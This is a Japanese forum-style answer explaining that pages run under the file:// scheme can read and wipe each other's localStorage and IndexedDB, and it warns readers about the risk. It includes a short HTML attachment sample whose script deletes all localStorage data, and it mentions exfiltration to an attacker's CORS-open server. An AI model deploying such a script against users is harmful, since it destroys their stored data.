「ブラウザの開発元(ChromeならGoogle)に送信されてしまうリスク」ではないので参考までに。
fileスキーム(file://)で動作させているということは同じくfileスキームで読み込んだページからデータを取得し放題です。
例えば、以下のようなHTMLファイルが添付されたメール(HTMLメールではないです)を受け取ります。
HTML
1<!DOCTYPE html>
2<html>
3 <head>
4 <title></title>
5 </head>
6 <body>
7 <script>
8 var a=[];
9 for(var b in localStorage) {a.push(b);}
10 a.forEach(function(c){delete localStorage[c];});
11 </script>
12 </body>
13</html>
この添付ファイルを機密データを普段読み込んでいるのと同じブラウザで開いてしまうと、データが全部消えます。もちろんIndexedDBでも可能です。
悪意のある人が自分でAccess-Control-Allow-Origin: *
なサーバを用意すればそこに向かって自動でデータを送信することも可能なのではないでしょうか。
ちなみにこの辺りのリスクがあるからでしょうか、Microsoft製のブラウザはfileスキームでJavaScriptの動作を許可してもストレージにはアクセスできなくなっています。
現状Chrome, FireFox, Safariなどはfileスキームでも動作してしまいます。ご注意を。